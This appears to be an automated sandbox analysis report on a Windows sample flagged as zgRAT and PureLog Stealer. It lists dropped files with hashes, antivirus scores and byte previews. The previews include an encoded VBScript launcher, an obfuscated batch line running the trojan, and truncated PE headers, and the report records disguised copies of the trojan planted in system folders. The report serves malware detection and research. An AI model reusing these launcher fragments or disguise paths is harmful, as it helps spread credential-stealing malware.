SHA-256: DAF88159A6E3881975CE57838FD28E21CC2CD6EEB5893BFF93778055250EE510
SHA-512: FCE89CDF68F03AB969079538E7832A210D4DADB107A89B114AC04CE52F0E2F9B5059905AC93833907A973341FB4488A8A1171007903613A9D542B877385B7FFD
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
                                                                                                Preview:#@~^3AAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vFX!ZT*@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=zuHw.D..4(.W0+.zJV!U(9wN+FxC,Z;LE:I! djpCD0;VwhF6&*%4}%}6O,fx.{2Zqg}.R4mYrSPZ~~0mVdnyEUAAA==^#~@.
                                                                                                Process:C:\Users\user\Desktop\hz7DzW2Yop.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):93
                                                                                                Entropy (8bit):4.852901781263745
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Q1AwI2TwUEiUzlzcGHaOZHmFyVATbMsb4aZn:XK4uGldAGAToO
                                                                                                MD5:DBB44638C3B379F5404B64129725B321
                                                                                                SHA1:6565668D25A295F6EFA600BB58ECA92A8DA929A6
                                                                                                SHA-256:3AAF5C7D8B99E1A6F2E02CA39B022C0E199C3AF2CD7BD437A21506D4824936C7
                                                                                                SHA-512:D98494A60E4028E3FA51008831DDFF8BCE8D56B830BB8A241FC6E9B36AB031B145B7339857FF876AA2B60AE35449147066B52E17DDF580B2E198948F1E004F1E
                                                                                                Malicious:false
                                                                                                Preview:%NZOk%%NdZmpBrqvSSov%..%VyqaSvUIqhryFO%"C:\HyperWebbroker/serverBrokerperfMonitor.exe"%CyxRv%
                                                                                                Process:C:\Users\user\Desktop\hz7DzW2Yop.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):2639872
                                                                                                Entropy (8bit):7.708083768963088
                                                                                                Encrypted:false
                                                                                                SSDEEP:49152:BP7hQ8Pq9P0qBSw83+Gnfm+VS9QxqgYRvzd4WihPt:BPpicQSwYne++govniz
                                                                                                MD5:C1CF39EF49B82B35938CA7A45DBCCEEE
                                                                                                SHA1:5F299703C001F490C4D216C357BB468265714541
                                                                                                SHA-256:E50625F048DA6C56A34810822FBAE68C7159C966450CFE73FEC3A8D0CDA0AFCA
                                                                                                SHA-512:279B9E3BF02AF93934C25E604E2039F2CC336780EAA71B8E0AB7E58FEEE9809422D0FD107C82B2E1BA4E66E96F968B00F0B49395E79947262C88AE34650AF76B
                                                                                                Malicious:true
                                                                                                Yara Hits:
                                                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe, Author: Joe Security
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe, Author: Joe Security
                                                                                                Antivirus:
                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                • Antivirus: ReversingLabs, Detection: 68%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................@(.........^_(.. ...`(...@.. ........................(...........@.................................._(.K....`(.p.....................(...................................................... ............... ..H............text...d?(.. ...@(................. ..`.rsrc...p....`(......B(.............@....reloc........(......F(.............@..B................@_(.....H.......P...........e...d........^(......................................0..........(.... ........8........E........\...)...M...8....(.... ....~~...{....:....& ....8....(.... ....~~...{....:....& ....8....(.... ....8....*....0.......... ........8........E................F.......|...8........~....(L...~....(P... ....<~... ....~~...{h...9....& ....8....~....(D... .... .... ....s....~....(H....... ....8g...~....:*... ....~~...{....:I...& ....8>...r...ps....z*8.... ....~~...{....
                                                                                                Process:C:\HyperWebbroker\serverBrokerperfMonitor.exe
                                                                                                File Type:ASCII text, with very long lines (948), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):948
                                                                                                Entropy (8bit):5.901192535524882
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:sGnQECmVxv52DpXH6zCPw/CXmP3UtMiJsQchpRYoWhNMr:sGnvZfv0DpK8WMtMUgoNQ
                                                                                                MD5:3B0CA8246121DF5D14D3C47EC0153521
                                                                                                SHA1:414A4C9CAE11AEFD2948B143D51F3BB40A22A600
                                                                                                SHA-256:56BB4C312C83C900081CA642205284988F98560F036605ED4DCEDB9B6FB21871
                                                                                                SHA-512:48D62FB2218566E7E8A7DCA4879AE9868A4524D5CF533BC04C4165468AEDD0C2304129D6310874C1CE9E228F3C2B48A7457F76BE9667ADBE0D78483BC7018E02
                                                                                                Malicious:false
                                                                                                Process:C:\HyperWebbroker\serverBrokerperfMonitor.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):2639872
                                                                                                Entropy (8bit):7.708083768963088
                                                                                                Encrypted:false
                                                                                                SSDEEP:49152:BP7hQ8Pq9P0qBSw83+Gnfm+VS9QxqgYRvzd4WihPt:BPpicQSwYne++govniz
                                                                                                MD5:C1CF39EF49B82B35938CA7A45DBCCEEE
                                                                                                SHA1:5F299703C001F490C4D216C357BB468265714541
                                                                                                SHA-256:E50625F048DA6C56A34810822FBAE68C7159C966450CFE73FEC3A8D0CDA0AFCA
                                                                                                SHA-512:279B9E3BF02AF93934C25E604E2039F2CC336780EAA71B8E0AB7E58FEEE9809422D0FD107C82B2E1BA4E66E96F968B00F0B49395E79947262C88AE34650AF76B
                                                                                                Malicious:true
                                                                                                Yara Hits:
                                                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Windows Defender\en-GB\uAsLgsGzSk.exe, Author: Joe Security
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Defender\en-GB\uAsLgsGzSk.exe, Author: Joe Security
                                                                                                Antivirus:
                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                • Antivirus: ReversingLabs, Detection: 68%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................@(.........^_(.. ...`(...@.. ........................(...........@.................................._(.K....`(.p.....................(...................................................... ............... ..H............text...d?(.. ...@(................. ..`.rsrc...p....`(......B(.............@....reloc........(......F(.............@..B................@_(.....H.......P...........e...d........^(......................................0..........(.... ........8........E........\...)...M...8....(.... ....~~...{....:....& ....8....(.... ....~~...{....:....& ....8....(.... ....8....*....0.......... ........8........E................F.......|...8........~....(L...~....(P... ....<~... ....~~...{h...9....& ....8....~....(D... .... .... ....s....~....(H....... ....8g...~....:*... ....~~...{....:I...& ....8>...r...ps....z*8.... ....~~...{....
                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x1edbb58c, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                Category:dropped
                                                                                                Size (bytes):1310720
                                                                                                Entropy (8bit):0.42213608311883316
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:pSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:paza/vMUM2Uvz7DO
                                                                                                MD5:1D3EEAD89220FBC97E2B429C727136DB
                                                                                                SHA1:432405DDDE0732B2CBD7B4E504D704ECFBF8AA4A
                                                                                                SHA-256:68B7A7A6E0C5432A7A5CE46DBBDB388D829E528CEC6F622B04BA2BD2D3588096
                                                                                                SHA-512:7FB941704B0218072D76C196508213B85446E5FBE33C7AAD26530823BC4ED152CAFE1550FA242077CDDCDBF8D81FDDCD52C99B007B53DC1C5D97754B6C328E2C
                                                                                                Malicious:false
                                                                                                Preview:...... .......A.......X\...;...{......................0.!..........{A..9...}..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{..................................ap.<.9...}i.................$U...9...}...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\HyperWebbroker\serverBrokerperfMonitor.exe
                                                                                                File Type:ASCII text, with very long lines (689), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):689
                                                                                                Entropy (8bit):5.869777810154306
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:JOVNq37HAqICd3K67PgKwWePGwqfGR0elLj8UfIeKoRj6kkWF/AwH7IiMuadXX/:JOV43DAqICd3x7PgK5wZuAfgeKMjPFVs
                                                                                                MD5:CC995AAFFCF4AED7014294DE61621D92
                                                                                                SHA1:0B6780AD4AD1DE0E2D555D09F778A79B76CD183C
                                                                                                SHA-256:9B6D5A24675A70198C16BACF8F09C5BFA97D37592F103074A80794F0A239E0DF
                                                                                                SHA-512:96D1F2889D49D67788B4191FD390F4A4F05DF34DF9319CBFA550896297C37CA99BF1E943E18180BFEB8911B8E1F05462BB7A629CD6B28850864C4C784DA36030
                                                                                                Malicious:false
                                                                                                Process:C:\HyperWebbroker\serverBrokerperfMonitor.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):2639872
                                                                                                Entropy (8bit):7.708083768963088
                                                                                                Encrypted:false
                                                                                                SSDEEP:49152:BP7hQ8Pq9P0qBSw83+Gnfm+VS9QxqgYRvzd4WihPt:BPpicQSwYne++govniz
                                                                                                MD5:C1CF39EF49B82B35938CA7A45DBCCEEE
                                                                                                SHA1:5F299703C001F490C4D216C357BB468265714541
                                                                                                SHA-256:E50625F048DA6C56A34810822FBAE68C7159C966450CFE73FEC3A8D0CDA0AFCA
                                                                                                SHA-512:279B9E3BF02AF93934C25E604E2039F2CC336780EAA71B8E0AB7E58FEEE9809422D0FD107C82B2E1BA4E66E96F968B00F0B49395E79947262C88AE34650AF76B
                                                                                                Malicious:true
                                                                                                Yara Hits:
                                                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\SystemSettings.exe, Author: Joe Security
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\SystemSettings.exe, Author: Joe Security
                                                                                                Antivirus:
                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                • Antivirus: ReversingLabs, Detection: 68%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................@(.........^_(.. ...`(...@.. ........................(...........@.................................._(.K....`(.p.....................(...................................................... ............... ..H............text...d?(.. ...@(................. ..`.rsrc...p....`(......B(.............@....reloc........(......F(.............@..B................@_(.....H.......P...........e...d........^(......................................0..........(.... ........8........E........\...)...M...8....(.... ....~~...{....:....& ....8....(.... ....~~...{....:....& ....8....(.... ....8....*....0.......... ........8........E................F.......|...8........~....(L...~....(P... ....<~... ....~~...{h...9....& ....8....~....(D... .... .... ....s....~....(H....... ....8g...~....:*... ....~~...{....:I...& ....8>...r...ps....z*8.... ....~~...{....
                                                                                                Process:C:\HyperWebbroker\serverBrokerperfMonitor.exe
                                                                                                File Type:ASCII text, with very long lines (872), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):872
                                                                                                Entropy (8bit):5.901295000659748
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:0oIBsMbz63mM2DnSuiciRL6xJYS76/MW8yEc:bIZ02jSuic9x1sMc
                                                                                                MD5:AA36663A71D70557491693DDE2D07742
                                                                                                SHA1:A0FD0EF1D04221C59EB79B296B79C24D33771A34
                                                                                                SHA-256:7EFDF317B2FFFA228BDE45332173DB26034D4A3DED9E88504B66CEB3776B63D4
                                                                                                SHA-512:3E1AB4E738E0E465296C76A9BD3CA668729557A87F0794372F61A590BB7A5513989A8B6969AC353598227BF6F02B01ACCC4B7BD02A89216F20E7FF9C1FF9426B
                                                                                                Malicious:false
                                                                                                Preview:iETgBmn3JmKlxWPBBRXT5pncL1vMwK6QTtue5AGlWVwrUk09hKqUEM72b0VJ0aG8q3SDmuFBKw6j35IlAvomdmMGw2CFp7u5OxBaSxXxEpJRQX8gstIFveeEqLRusAVNBBVF3rTNY1hyc50Z3fX6ypKuS7uGfmFDT5POB3nAZ5q36qlvU10MnZZW1lw67NrvwdfhplXA2Wg29QxmW8vnv2a3f3XaGqDMN4HcKDFte0TR2gXkxKj8bD93DlBwN64MTUpEIUcS3CJ5jIB9gwn5HEuJ4NYiCTfh6H7i1SbcrQFY4EU5kCQaT8EOjfJ553Qjhl9cKcHNVKO09WP03d7ADEN7Ct8WIghxAf1SE1uI4CFJuOONQTCc6QgdYCabevEymazee7wBtzFA8ENxeuFzeE1u8Y4CbTnJ8RgUYusThAsHLgeTym6tpOUhiEfGCtkaL5Crh2YtBwSeWujc3kNzW4et68vUPmQxZS5Peww5NMr250LyfDMcfvDRbSuiHEeZgfEEyT8HyRmKMlxGx7yLZySoOoyLBNyIrSWavH9LFFoNJ3EzfovJQT9sNazKfxFkddc4PXVp8nGUKEfUj9pXbp2YSnNURyqSADupbKjISGLnMoiI5flgHrJxlDllJAXJ6xUGT02YZhEVeOLnFEZwMKKT46DXj88SsBqZUbzFmNGjmxTX27fFll6wmBMWwfzaiwmciwToOUK9DkqGnqflc2rHE4wTOcSGYpAzK0yFo10Rb7sBUFtG9N8qFfYoA9ZwBDlXj05w1Z7lCaqGLu9JtLHLrUupcKFobEPXWUbdJ6PkPXnpzRcP9QC06aqPGQTqTSJ8KSu0Sf9w6g5UrF0LszpLBZb6oMX3niQ6Npeg
                                                                                                Process:C:\HyperWebbroker\serverBrokerperfMonitor.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):2639872
                                                                                                Entropy (8bit):7.708083768963088
                                                                                                Encrypted:false
                                                                                                SSDEEP:49152:BP7hQ8Pq9P0qBSw83+Gnfm+VS9QxqgYRvzd4WihPt:BPpicQSwYne++govniz
                                                                                                MD5:C1CF39EF49B82B35938CA7A45DBCCEEE
                                                                                                SHA1:5F299703C001F490C4D216C357BB468265714541
                                                                                                SHA-256:E50625F048DA6C56A34810822FBAE68C7159C966450CFE73FEC3A8D0CDA0AFCA
                                                                                                SHA-512:279B9E3BF02AF93934C25E604E2039F2CC336780EAA71B8E0AB7E58FEEE9809422D0FD107C82B2E1BA4E66E96F968B00F0B49395E79947262C88AE34650AF76B
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 68%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................@(.........^_(.. ...`(...@.. ........................(...........@.................................._(.K....`(.p.....................(...................................................... ............... ..H............text...d?(.. ...@(................. ..`.rsrc...p....`(......B(.............@....reloc........(......F(.............@..B................@_(.....H.......P...........e...d........^(......................................0..........(.... ........8........E........\...)...M...8....(.... ....~~...{....:....& ....8....(.... ....~~...{....:....& ....8....(.... ....8....*....0.......... ........8........E................F.......|...8........~....(L...~....(P... ....<~... ....~~...{h...9....& ....8....~....(D... .... .... ....s....~....(H....... ....8g...~....:*... ....~~...{....:I...& ....8>...r...ps....z*8.... ....~~...{....
                                                                                                Process:C:\HyperWebbroker\serverBrokerperfMonitor.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):1689
                                                                                                Entropy (8bit):5.356756887109143
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkrJHV1qHGIs1HmHKlT4vHNpv:iqbYqGSI6oPtzHeqKkt1wmj1GqZ4vtpv
                                                                                                MD5:492A92D0EE9C7BD43DFCEC3E9B5026E2
                                                                                                SHA1:93BC2DF595AA42E5D5EA39524B2BADCA903C964E
                                                                                                SHA-256:03EB4302FE4EAADFA51D085CE53742C2DE6B09FDF2E3D9777E35CA638393135B
                                                                                                SHA-512:B24A61EC3D0E8B44D65DE4DCCCB0BC8EE1F95471FEB72C529217F82B7342AC704EA38A24E698E5AE69BAF31AC28C6C1D8EE11FAEDA6BF49265F29B804B9D5F82
                                                                                                Malicious:false
                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyT
                                                                                                Process:C:\Recovery\uAsLgsGzSk.exe
                                                                                                File Type:CSV text
                                                                                                Category:dropped
                                                                                                Size (bytes):847
                                                                                                Entropy (8bit):5.354334472896228
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                                MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                                SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                                SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                                SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                                Malicious:false
                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):64
                                                                                                Entropy (8bit):1.1510207563435464
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:NlllulTkklh:NllUokl
                                                                                                MD5:8F489B5B8555D6E9737E8EE991AA32FD
                                                                                                SHA1:05B412B1818DDB95025A6580D9E1F3845F6A2AFC
                                                                                                SHA-256:679D924F42E8FC107A7BE221DE26CCFEBF98633EA2454D3B4E0D82ED66E3E03D
                                                                                                SHA-512:97521122A5B64237EF3057A563284AC5C0D3354E8AC5AA0DE2E2FA61BA63379091200D1C4A36FABC16B049E83EF11DBB62E1987A6E4D6A4BCD5DDB27E7BD9F49
                                                                                                Malicious:false
                                                                                                Preview:@...e................................................@..........
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):126976
                                                                                                Entropy (8bit):0.47147045728725767
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                Category:dropped
                                                                                                Size (bytes):159744
                                                                                                Entropy (8bit):0.7873599747470391
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                Category:dropped
                                                                                                Size (bytes):159744
                                                                                                Entropy (8bit):0.7873599747470391
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
